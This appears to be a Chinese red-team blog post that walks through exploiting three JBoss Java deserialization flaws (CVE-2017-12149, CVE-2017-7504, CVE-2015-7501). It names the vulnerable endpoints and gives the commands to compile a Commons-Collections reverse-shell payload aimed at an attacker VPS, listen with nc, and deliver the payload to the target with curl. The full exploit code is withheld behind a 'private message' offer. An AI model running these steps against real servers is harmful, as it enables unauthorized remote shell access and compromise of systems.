java反序列化漏洞利用工具_红队攻击之利用jboss反序列化获取目标权限漏洞梳理

JBOSS AS 6.x反序列化(CVE-2017-12149)

漏洞影响5.x和6.x版本的JBOSSAS

1、检测目录 192.168.28.138:60899/invoker/readonly

30ff0a8e294e99aef5e1ee0be22906a0.png

2、Linux下编译java代码,然后生成反弹shell序列化文件,内容较长,可私信“jboss”获取代码

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.javajava -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap your_vps_ip:8888
e57da2ba1280c4a8c993155961203469.png

3、nc监听上述反弹shell端口

12bf7aaf300ac15f01807dc3681754a1.png

4、向目标发送生成的序列化文件即可收到反弹shell

curl http://192.168.28.138:60899/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
9149fc0725b8b224eb33b7150d2a1d33.png

5、接收反弹shell

9f01f1f75a05e3d423144380207847bc.png

JBOSS AS 4.x JbossMQ JMS反序列化(CVE-2017-7504)

影响范围:JBoss AS 4.x及之前版本。跟CVE-2017-12149使用同样的payload

1、检测目录192.168.28.138:57287/jbossmq-httpil/HTTPServerILServlet

ceb546e4d936bbfeece117d3cdc15c18.png

2、nc监听

faeb89f85d6e5c5c63110bf01df3f4b5.png

3、发送payload getshell

curl http://192.168.28.138:57287/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser
fcdefe5bbfb4edeeb309bc29d73ee7aa.png

4、接收反弹shell

2ee3612ddf3c528d9c473d21f3f27c42.png

JBOSS Java反序列化(CVE-2015-7501)

也就是15年出来的Java反序列化漏洞

e0b30f54923e5977399a6e738493a94d.png

1、检测目录192.168.28.138:57287/invoker/JMXInvokerServlet

2、直接利用Java反序列化工具即可

b2a7889c3a6f0c74922de81df692cac2.png

私信“jboss”获取利用代码及工具。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值